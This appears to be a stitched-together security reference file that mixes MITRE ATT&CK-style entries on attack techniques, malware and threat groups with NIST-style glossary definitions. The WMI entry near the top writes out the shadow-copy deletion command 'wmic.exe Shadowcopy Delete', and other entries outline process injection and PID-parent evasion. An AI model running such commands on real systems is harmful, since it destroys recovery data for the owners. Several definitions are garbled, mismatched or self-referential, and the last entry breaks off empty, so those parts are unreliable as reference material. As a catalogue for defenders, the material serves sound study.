The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model and Windows Remote Management. Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS. 

An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as Execution of commands and payloads. For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., Inhibit System Recovery).

**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by PowerShell as the primary WMI interface. In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.

Term: Compromised state
Definition: A key state to which a key is transitioned when there is a suspicion or confirmation of the key’s compromise.

Term: Privacy Risk Assessment Methodology (PRAM)
Definition: The PRAM is a tool that applies the risk model from NISTIR 8062 and helps organizations analyze, assess, and prioritize privacy risks to determine how to respond and select appropriate solutions. The PRAM can help drive collaboration and communication between various components of an organization, including privacy, cybersecurity, business, and IT personnel.

Term: information system security plan
Definition: A document that describes how an organization meets the security requirements for a system or how an organization plans to meet the requirements. In particular, the system security plan describes the system boundary, the environment in which the system operates, how security requirements are implemented, and the relationships with or connections to other systems.

Name: Exfiltration to Text Storage Sites
Type: attack-pattern
Description: Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information. 

Text storage sites are often used to host malicious code for C2 communication (e.g., Stage Capabilities), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.

**Note:** This is distinct from Exfiltration to Code Repository, which highlight access to code repositories via APIs.

Term: Private cloud
Definition: The cloud infrastructure is provisioned for exclusive use by a single organization comprising multiple consumers (e.g., business units). It may be owned, managed, and operated by the organization, a third party, or some combination of them, and it may exist on or off premises.

Name: Serverless Execution
Type: attack-pattern
Description: Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. 

Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. Resource Hijacking). Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add Additional Cloud Roles to a serverless cloud function, which may then be able to perform actions the original user cannot.

Serverless functions can also be invoked in response to cloud events (i.e. Event Triggered Execution), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds Additional Cloud Credentials to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created. This is also possible in many cloud-based office application suites. For example, in Microsoft 365 environments, an adversary may create a Power Automate workflow that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint. In Google Workspace environments, they may instead create an Apps Script that exfiltrates a user's data when they open a file.

Term: multi-factor authentication
Definition: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. This was previously referred to as a token.

Term: Supporting Services
Definition: Providers of external system services to the manufacturer through a variety of consumer-producer relationships including but not limited to: joint ventures; business partnerships; outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements); licensing agreements; and/or supply chain exchanges. Supporting services include, for example, Telecommunications, engineering services, power, water, software, tech support, and security.

Term: CryptoMod
Definition: A DoD initiative to modernize the NSA-certified cryptographic product inventory.

Term: Subscriber Identity Module (SIM)
Definition: A smart card chip specialized for use in GSM equipment.

Term: Capability, Configuration Settings Management
Definition: See Capability, Configuration Settings Management.

Term: specification
Definition: The requirements for the security-relevant portion of the system. 
Note: The security specification may be provided as a separate document or may be captured with a broader specification.

Term: Algorithm security lifetime
Definition: The estimated time period during which data protected by a specific cryptographic algorithm remains secure, given that the key has not been compromised.

Term: authorized ID
Definition: The key management entity (KME) authorized to order against a traditional short title.

Name: Operation Sharpshooter
Type: campaign
Description: Operation Sharpshooter was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous Lazarus Group operations, including fake job recruitment lures and shared malware code.

Term: cryptographic key
Definition: A parameter used in the block cipher algorithm that determines the forward cipher function.

Term: Concatenation
Definition: Concatenation; e.g. A || B is the concatenation of bit strings A and B.

Term: Web Service Interoperability (WS-I) Basic Profile
Definition: A set of standards and clarifications to standards that vendors must follow for basic interoperability with SOAP products.

Term: Internet Key Exchange (IKE)
Definition: The Internet Engineering Task Force (IETF) protocol (RFC 5996) that is used to set up a security association in the Internet Protocol Security (IPsec) protocol suite.

Name: Automated Exfiltration
Type: attack-pattern
Description: Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel and Exfiltration Over Alternative Protocol.

Term: Logo
Definition: NIST National Checklist Program logo.

Name: China Chopper
Type: malware
Description: China Chopper is a Web Shell hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. It has been used by several threat groups.

Term: Log Clearing
Definition: Removing all entries from a log that precede a certain date and time.

Term: Secret keying material
Definition: The binary data that is used to form secret keys, such as AES encryption or HMAC keys.

Term: media
Definition: Plural of medium.

Term: <em>H(x)</em>
Definition: A cryptographic hash function with x as an input.

Term: cryptology
Definition: The mathematical science that deals with cryptanalysis and cryptography.

Term: key-establishment key pair
Definition: A private/public key pair used in a key-establishment scheme. It can be a static key pair or an ephemeral key pair.

Name: Control Panel
Type: attack-pattern
Description: Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function. For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. 

Malicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware. Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.

Name: Stuxnet
Type: malware
Description: Stuxnet was the first publicly reported malware to specifically target industrial control systems devices. Stuxnet is a large and complex malware that utilized multiple behaviors, including numerous zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines. Stuxnet was discovered in 2010, with some components being used as early as November 2008.

Term: keying material
Definition: A cryptographic key and other parameters (e.g., IVs or domain parameters) used with a cryptographic algorithm. When keying material is derived as specified in SP 800-56CSP 800-108:bit string such that any non-overlapping segments of the string with the required lengths 4 and 5 Data represented as a can be used as secret keys, secret initialization vectors, and other secret parameters.

Term: protection
Definition: In the context of systems security engineering, a control objective that applies across all types of asset types and the corresponding consequences of loss. A system protection capability is a system control objective and a system design problem. The solution to the problem is optimized through a balanced proactive strategy and a reactive strategy that is not limited to prevention. The strategy also encompasses avoiding asset loss and consequences; detecting asset loss and consequences; minimizing (i.e., limiting, containing, restricting) asset loss and consequences; responding to asset loss and consequences; recovering from asset loss and consequences; and forecasting or predicting asset loss and consequences.

Term: federal agency
Definition: See executive agency.

Name: HTTPBrowser
Type: malware
Description: HTTPBrowser is malware that has been used by several threat groups. It is believed to be of Chinese origin.

Term: attestation
Definition: Information conveyed to the CSP, generally at the time that an authenticator is bound, to describe the characteristics of a connected authenticator or the endpoint involved in an authentication operation.

Name: NavRAT
Type: malware
Description: NavRAT is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea.

Term: Rekey
Definition: A procedure in which a new cryptographic key is generated in a manner that is independent of the (old) cryptographic key that it will replace. Contrast with Key update.

Term: ISU
Definition: Individual, or (system) process acting on behalf of an individual, authorized to access an information system.
[Note: With respect to SecCM, an information system user is an individual who uses the information system functions, initiates change requests, and assists with functional testing.]

Term: 2FA
Definition: Authentication using two or more factors to achieve authentication. Factors include: (i) something you know (e.g., password/personal identification number [PIN]); (ii) something you have (e.g., cryptographic identification device, token); or (iii) something you are (e.g., biometric).

Term: authenticate
Definition: A process that provides assurance of the source and integrity of information in communications sessions, messages, documents or stored data or that provides assurance of the identity of an entity interacting with a system.

Name: Code Signing
Type: course-of-action
Description: Code Signing is a security process that ensures the authenticity and integrity of software by digitally signing executables, scripts, and other code artifacts. It prevents untrusted or malicious code from executing by verifying the digital signatures against trusted sources. Code signing protects against tampering, impersonation, and distribution of unauthorized or malicious software, forming a critical defense against supply chain and software exploitation attacks. This mitigation can be implemented through the following measures:

Enforce Signed Code Execution:

- Implementation: Configure operating systems (e.g., Windows with AppLocker or Linux with Secure Boot) to allow only signed code to execute.
- Use Case: Prevent the execution of malicious PowerShell scripts by requiring all scripts to be signed with a trusted certificate.

Vendor-Signed Driver Enforcement:

- Implementation: Enable kernel-mode code signing to ensure that only drivers signed by trusted vendors can be loaded.
- Use Case: A malicious driver attempting to modify system memory fails to load because it lacks a valid signature.

Certificate Revocation Management:

- Implementation: Use Online Certificate Status Protocol (OCSP) or Certificate Revocation Lists (CRLs) to block certificates associated with compromised or deprecated code.
- Use Case: A compromised certificate used to sign a malicious update is revoked, preventing further execution of the software.

Third-Party Software Verification:

- Implementation: Require software from external vendors to be signed with valid certificates before deployment.
- Use Case: An organization only deploys signed and verified third-party software to prevent supply chain attacks.

Script Integrity in CI/CD Pipelines:

- Implementation: Integrate code signing into CI/CD pipelines to sign and verify code artifacts before production release.
- Use Case: A software company ensures that all production builds are signed, preventing tampered builds from reaching customers.

**Key Components of Code Signing**

- Digital Signature Verification: Verifies the authenticity of code by ensuring it was signed by a trusted entity.
- Certificate Management: Uses Public Key Infrastructure (PKI) to manage signing certificates and revocation lists.
- Enforced Policy for Unsigned Code: Prevents the execution of unsigned or untrusted binaries and scripts.
- Hash Integrity Check: Confirms that code has not been altered since signing by comparing cryptographic hashes.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed length bit string. Approved hash functions satisfy the following properties:
1.      One-Way. It is computationally infeasible to find any input that maps to any pre-specified output.
2.      Collision Resistant. It is computationally infeasible to find any two distinct inputs that map to the same output.

Name: ASPXSpy
Type: malware
Description: ASPXSpy is a Web shell. It has been modified by Threat Group-3390 actors to create the ASPXTool version.

Name: Portable Executable Injection
Type: attack-pattern
Description: Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: risk aggregation
Definition: The combination of several risks into one risk to develop a more complete understanding of the overall risk.

Term: supply chain element
Definition: Organizations, entities, or tools employed for the research and development, design, manufacturing, acquisition, delivery, integration, operations and maintenance, and/or disposal of systems and system components.

Term: Hardware Security Module (HSM)
Definition: A physical computing device that provides tamper-evident and intrusion-resistant safeguarding and management of digital keys and other secrets, as well as crypto-processing. (FIPS 140-2) specifies requirements for HSMs.

Term: statistical disclosure control
Definition: The set of methods to reduce the risk of disclosing information on individuals, businesses or other organizations. Such methods are only related to the dissemination step and are usually based on restricting the amount of or modifying the data released.

Name: Break Process Trees
Type: attack-pattern
Description: An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs. 

On Linux systems, adversaries may execute a series of Native API calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.

Another example is using the “daemon” syscall to detach from the current parent process and run in the background.

Term: information system component
Definition: All components of an information system to be authorized for operation by an authorizing official and excludes separately authorized systems, to which the information system is connected.

Name: PowerPunch
Type: malware
Description: PowerPunch is a lightweight downloader that has been used by Gamaredon Group since at least 2021.

Term: XACML
Definition: A general purpose language for specifying access control policies.

Term: trust relationship
Definition: An agreed upon relationship between two or more system elements that is governed by criteria for secure interaction, behavior, and outcomes relative to the protection of assets.

Name: JumbledPath
Type: malware
Description: JumbledPath is a custom-built utility written in GO that has been used by Salt Typhoon since at least 2024 for packet capture on remote Cisco devices. JumbledPath is compiled as an ELF binary using x86-64 architecture which makes it potentially useable across Linux operating systems and network devices from multiple vendors.

Term: Self-signed certificate
Definition: A public-key certificate whose digital signature may be verified by the public key contained within the certificate. The signature on a self- signed certificate protects the integrity of the data, but does not guarantee the authenticity of the information. The trust of self-signed certificates is based on the secure procedures used to distribute them.

Term: access authority
Definition: An entity responsible for monitoring and granting access privileges for other authorized entities.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines the algorithm’s operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples include:
1. The transformation of plaintext data into ciphertext data,
2. The transformation of ciphertext data into plaintext data,
3. The computation of a digital signature from data,
4. The verification of a digital signature,
5. The computation of an authentication code from data,
6. The verification of an authentication code from data and a received authentication code.

Term: IT
Definition: Any equipment or interconnected system or subsystem of equipment used in the automatic acquisition, storage, analysis, evaluation, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency that requires the use (i) of that equipment or (ii) of that equipment to a significant extent in the performance of a service or the furnishing of a product. Includes computers, ancillary equipment (including imaging peripherals, input, output, and storage devices necessary for security and surveillance), peripheral equipment designed to be controlled by the central processing unit of a computer, software, firmware and similar procedures, services (including support services), and related resources. Does not include any equipment acquired by a federal contractor incidental to a federal contract.

Term: Deterministic Random Bit Generator
Definition: An RBG that includes a DRBG mechanism and (at least initially) has access to a randomness source. The DRBG produces a sequence of bits from a secret initial value called a seed, along with other possible inputs. A DRBG is often called a Pseudorandom Number (or Bit) Generator. Contrast with NRBG.

Term: Continuous Diagnostics and Mitigation (CDM)
Definition: See Continuous Diagnostics and Mitigation.

Term: cyber incident
Definition: Occurrence or change of a particular set of circumstances.

Term: Manufacturer Usage Description (MUD)
Definition: A component-based architecture specified in Request for Comments (RFC) 8520 that is designed to provide a means for end devices to signal to the network what sort of access and network functionality they require to properly function.

Term: <em>On</em>
Definition: Block of data representing Output Block n

Name: at
Type: tool
Description: at is used to schedule tasks on a system to run at a specified date or time.

Name: CURIUM
Type: intrusion-set
Description: CURIUM is an Iranian threat group, first reported in September 2019 and active since at least July 2018, targeting IT service providers in the Middle East. CURIUM has since invested in building relationships with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note CURIUM has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.

Term: Source authentication
Definition: The process of providing assurance about the source of information. Sometimes called origin authentication. Compare with Identity authentication.

Name: xCaon
Type: malware
Description: xCaon is an HTTP variant of the BoxCaon malware family that has used by IndigoZebra since at least 2014. xCaon has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.

Term: OLIR Developer
Definition: A person, team, or organization that creates an Informative Reference.

Term: internal network
Definition: A network where: (i) the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or (ii) cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints, provides the same effect (at least with regard to confidentiality and integrity). An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned.

Term: <em>List</em>
Definition: A dynamic-length data structure that stores a sequence of values, where each value is identified by its integer index.

Term: Probative Data
Definition: Information that reveals the truth of an allegation.

Term: Randomness extraction
Definition: The first step in the two-step key-derivation procedure during which a key-derivation key is produced. The second step in the procedure is key expansion.

Term: delay (path delay)
Definition: The [signal] delay between a transmitter and a receiver. Path delay is often the largest contributor to time transfer uncertainty. For example, consider a radio signal broadcast over a 1000 km path. Since radio signals travel at the speed of light (with a delay of about 3.3 µs/km), we can calibrate the 1000 km path by estimating the path delay as 3.3 ms and applying a 3.3 ms correction to our measurement. Sophisticated time transfer systems, such as GPS, automatically correct for path delay. The absolute path delay is not important to frequency transfer systems because on-time pulses are not required, but variations in path delay still limit the frequency uncertainty.

Term: backdoor poisoning attack
Definition: A poisoning attack that causes a model to perform an adversary-selected behaviour in response to inputs that follow a particular backdoor pattern.

Term: organizationally-tailored control baseline
Definition: A control baseline tailored for a defined notional (type of) information system using overlays and/or system-specific control tailoring, and intended for use in selecting controls for multiple systems within one or more organizations.

Term: accountability
Definition: The security goal that generates the requirement for actions of an entity to be traced uniquely to that entity. This supports non-repudiation, deterrence, fault isolation, intrusion detection and prevention, and after-action recovery and legal action.

Name: Sharepoint
Type: attack-pattern
Description: Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., Unsecured Credentials)
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources

Name: DOGCALL
Type: malware
Description: DOGCALL is a backdoor used by APT37 that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit.

Term: incident handling
Definition: An IT security incident is an adverse event in a computer system or network caused by the failure of a security mechanism or an attempted or threatened breach of these mechanisms

Term: PIN
Definition: A secret number that a cardholder memorizes and uses to authenticate his or her identity as part of multifactor authentication.

Term: GPRS
Definition: A packet switching enhancement to GSM and TDMA wireless networks to increase data transmission speeds.

Term: Minor Revision
Definition: Any increase in the version of an SCAP component’s specification or SCAP related data set that may involve adding additional functionality, but that preserves backwards compatibility with previous releases.

Term: other system
Definition: A system that the system of interest interacts with in the operational environment. These systems may provide services to the system of interest (i.e., the system of interest is dependent on the other systems) or be the beneficiaries of services provided by the system of interest (i.e., other systems are dependent on the system of interest).

Term: <em>B</em>
Definition: The bit string to be determined

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides origin authentication, assurance of data integrity and signatory non-repudiation.

Term: anti-signal fingerprint
Definition: Result of measures used to resist attempts to uniquely identify a particular transmitter based on its signal parameters.

Term: Training
Definition: The ‘Training’ level of the learning continuum strives to produce relevant and needed security skills and competencies by practitioners of functional specialties other than IT security (e.g., management, systems design and development, acquisition, auditing).

Term: key transport
Definition: See Key transport.

Term: selection operation
Definition: See assignment operation and organization-defined control parameter.

Term: Inspection
Definition: Examination of an object of conformity assessment and determination of its conformity with detailed requirements or, on the basis of professional judgement, with general requirements.

Term: identified information
Definition: information that explicitly identifies an individual

Term: key escrow
Definition: The retention of the private component of the key pair associated with a subscriber’s encryption certificate to support key recovery.

Term: denial of service (DoS)
Definition: actions that prevent the NE from fimctioning in accordance with its intended purpose. A piece of equipment or entity may be rendered inoperable or forced to operate in a degraded state;
operations that depend on timeliness may be delayed.

Term: message digest
Definition: The fixed-length bit string produced by a hash function.

Term: File Allocation Unit
Definition: A group of contiguous sectors, also known as a cluster.

Name: Raindrop
Type: malware
Description: Raindrop is a loader used by APT29 that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was discovered in January 2021 and was likely used since at least May 2020.

Term: Features
Definition: The basic elements through which artifacts are compared. Comparison of two features always yields a binary {0, 1} outcome indicating a match or non-match; because features are defined as the most basic comparison unit that the algorithm considers, partial matches are not permitted. Generally, a feature can be any value derived from an artifact. Each approximate matching algorithm must define the structure of its features and the method by which they are derived. For example, an algorithm might define a feature as a (byte, offset) pair produced by reading the value of a byte and storing it along with the offset at which it was read.

Term: Privacy Control Assessor
Definition: See Security Control Assessor or Privacy Control Assessor.

Term: life cycle stages
Definition: Period that begins when a system is conceived and ends when the system is destroyed. Note 1: Often used synonymously with "system development life cycle (SDLC)", and sometimes defined with formalized steps (e.g. planning, analysis, design, implementation, and maintenance). Note 2: Those responsible for the security of a system will likely not have responsibility for the system throughout its entire life cycle, but should recognize the kinds of risks that may emanate from those areas of the lifecycle outside of their purview (e.g. supply chain risks or post- retirement risks). [ISO/IEC 24765:2017, adapted]

Term: Information Relevant to Cybersecurity
Definition: Information describing use of, assumptions, risks, vulnerabilities, assessments, and/or mitigations related to the IoT product, its components, and data.

Name: Machete
Type: intrusion-set
Description: Machete is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. Machete generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.

Term: certificate-related information
Definition: Information, such as subscriber's postal address, that is not included in a certificate. May be used by a certification authority (CA) managing certificates.

Name: netstat
Type: tool
Description: netstat is an operating system utility that displays active TCP connections, listening ports, and network statistics.

Term: AI
Definition: The attributes and methods necessary for uniquely identifying a given asset. A full explanation of asset identification is provided in [NISTIR 7693].

Name: TURNEDUP
Type: malware
Description: TURNEDUP is a non-public backdoor. It has been dropped by APT33's StoneDrill malware.

Term: Ease-of-use
Definition: A metric of satisfaction in using a product as established by one or more individuals using the product.

Term: Seed
Definition: A secret value that is used to initialize a process [e.g., a deterministic random bit generator (DRBG)].

Term: PRF
Definition: Pseudorandom Function.

Term: Testing
Definition: Determination of one or more characteristics of an object of conformity assessment, according to a procedure.

Term: Check Fact Reference
Definition: An expression that refers to a check (e.g., OVAL check, OCIL check).

Term: Key agreement primitive
Definition: A primitive algorithm used in a key-agreement scheme specified in [NIST SP 800-56A], or in [NIST SP 800-56B].

Name: EKANS
Type: malware
Description: EKANS is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. EKANS has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in MegaCortex.

Term: Backtracking Resistance
Definition: An RBG provides backtracking resistance relative to time T if it provides assurance that an adversary that has knowledge of the state of the RBG at some time(s) subsequent to time T (but incapable of performing work that matches the claimed security strength of the RBG) would be unable to distinguish between observations of ideal random bitstrings and (previously unseen) bitstrings that are output by the RBG at or prior to time T. In particular, an RBG whose design allows the adversary to "backtrack" from the initially-compromised RBG state(s) to obtain knowledge of prior RBG states and the corresponding outputs (including the RBG state and output at time T) would not provide backtracking resistance relative to time T. (Contrast with prediction resistance.)

Term: nonce
Definition: A time-varying value that has at most a negligible chance of repeating, e.g., a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Name: Virtual Private Server
Type: attack-pattern
Description: Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.

Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.

Term: penetration testing
Definition: A test methodology in which assessors, using all available documentation (e.g., system design, source code, manuals) and working under specific constraints, attempt to circumvent the security features of an information system.

Term: CA
Definition: The study of mathematical techniques for attempting to defeat cryptographic techniques and information system security. This includes the process of looking for errors or weaknesses in the implementation of an algorithm or of the algorithm itself.

Term: encrypted key
Definition: A cryptographic key that has been encrypted using an approved security function in order to disguise the value of the underlying plaintext key.

Name: Mivast
Type: malware
Description: Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach.

Term: security control baseline
Definition: The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system that provides a starting point for the tailoring process.

Name: Spearphishing Voice
Type: attack-pattern
Description: Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: Impersonation) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on User Execution for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware, or install adversary-accessible remote management tools (Remote Access Tools) onto their computer.

Adversaries may also combine voice phishing with Multi-Factor Authentication Request Generation in order to trick users into divulging MFA credentials or accepting authentication prompts.

Name: TruffleHog
Type: tool
Description: TruffleHog is an open-source secrets-discovery tool that is used to search for credentials, API keys, and encryption keys across a variety of data sources and environments. TruffleHog has the ability to discover credentials and secrets stored in code repositories, git history, CI/CD pipelines, among other common storage locations to include filesystems and cloud storage buckets. TruffleHog was first released by its author in 2016.

Term: Dictionary Maintainer
Definition: An organization that manages a CPE dictionary and all processes relating to that CPE dictionary. In the majority of cases, the organization that serves as the dictionary creator for a specific CPE dictionary will also serve as the dictionary maintainer. Otherwise, generally the dictionary maintainer is supporting the dictionary on behalf of the dictionary creator.

Term: MSB<i><sub>s</sub></i>(<i>X</i>)
Definition: The bit string consisting of the s left-most bits of the bit string X.

Name: Exploitation for Defense Impairment
Type: attack-pattern
Description: Adversaries may exploit vulnerabilities in security software, infrastructure, or defensive components to degrade, disable, or otherwise continue to impair their ability to prevent, detect, or respond to malicious activity. 
 
Adversaries may exploit a system or application vulnerability to directly interfere with defensive mechanisms. Exploitation occurs when an adversary takes advantage of a programming error in software, services, or the operating system to execute adversary-controlled code, often with the goal of weakening or disabling protections. 

Vulnerabilities may exist in security tools such as antivirus, endpoint detection and response (EDR), firewalls, or other monitoring solutions. Adversaries may use prior reconnaissance or perform discovery activities (e.g., Software Discovery) to identify defensive tools present in an environment and target them for exploitation. 

Successful exploitation may allow adversaries to terminate security processes, disable protections, bypass enforcement mechanisms, or reduce the effectiveness of defensive controls. In some cases, vulnerabilities in cloud-based or SaaS infrastructure may also be leveraged to bypass built-in security boundaries or disrupt visibility and enforcement across environments.

Term: derived requirement
Definition: A requirement that is implied or transformed from a higher-level requirement.
Note 1: Implied requirements cannot be assessed since they are not contained in any requirements baseline. The decomposition of requirements throughout the engineering process makes implicit requirements explicit, allowing them to be stated and captured in appropriate baselines and allowing associated assessment criteria to be stated. 
Note 2: A derived requirement must trace back to at least one higher-level requirement.

Term: e-authentication assurance level
Definition: A measure of trust or confidence in an authentication mechanism defined in publications Office of Management and Budget (OMB)-04-04 and NIST SP 800-63 in terms of four levels: 1: LITTLE OR NO confidence 2: SOME confidence 3: HIGH confidence 4: VERY HIGH confidence.

Term: cyber incident
Definition: Actions taken through the use of an information system or network that result in an actual or potentially adverse effect on an information system, network, and/or the information residing therein. See incident. See also event, security-relevant event, and intrusion.

Term: ARIN
Definition: The American Registry for Internet Numbers for Canada, the United States of America, and many Caribbean and North Atlantic Islands.

Term: LSB<i><sub>s</sub></i>(<i>X</i>)
Definition: The bit string consisting of the s right-most bits of the bit string X.

Term: block
Definition: A bit string whose length is the block size of the block cipher algorithm.

Term: Key-recovery agent
Definition: An FCKMS role that assists in the key-recovery/metadata-recovery process.

Name: Browser Fingerprint
Type: attack-pattern
Description: Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time zone, etc. The HTTP User-Agent request header is a string that lets servers and network peers identify the application, operating system, vendor, and/or version of the requesting user agent.

Adversaries may gather this information through System Information Discovery or by users navigating to adversary-controlled websites, and then use that information to craft their web traffic to evade defenses.

Term: <em>0x0X</em>
Definition: 8-bit binary representation of the hexadecimal number X, for example, 0x02 = 00000010.

Term: Machine-Readable
Definition: Product output that is in a structured format, typically XML, which can be consumed by another program using consistent processing logic.

Term: Core Software
Definition: An organizationally defined set of software that, at a minimum, includes firmware and root operating system elements used to boot the system. Core software merits specialized monitoring as it may be difficult for commonly used whitelisting software to check.

Term: United States government configuration baseline (USGCB)
Definition: The United States Government Configuration Baseline (USGCB) provides security configuration baselines for Information Technology products widely deployed across the federal agencies. The USGCB baseline evolved from the federal Desktop Core Configuration mandate. The USGCB is a Federal government-wide initiative that provides guidance to agencies on what should be done to improve and maintain effective configuration settings focusing primarily on security.

Term: SOW
Definition: The SOW details what the developer must do in the performance of the contract. Documentation developed under the contract, for example, is specified in the SOW. Security assurance requirements, which detail many aspects of the processes the developer follows and what evidence must be provided to assure the organization that the processes have been conducted correctly and completely, may also be specified in the SOW.

Term: outcome‐specific utility metrics
Definition: A way of measuring the utility of data for answering a specific question or class of questions.

Term: Coordination
Definition: Refers to the building, from a set of Web services, of something at a higher level, typically itself exposed as a larger Web service. Also referred to as “Composability.” Choreography and orchestration are two approaches to coordination.

Term: Key-derivation key
Definition: A key that is used as input to the key expansion step to derive other keys. In this Recommendation, the key derivation key is obtained by performing randomness extraction on a shared secret.

Term: FIREFLY
Definition: Key management protocol based on public key cryptography.

Name: Helminth
Type: malware
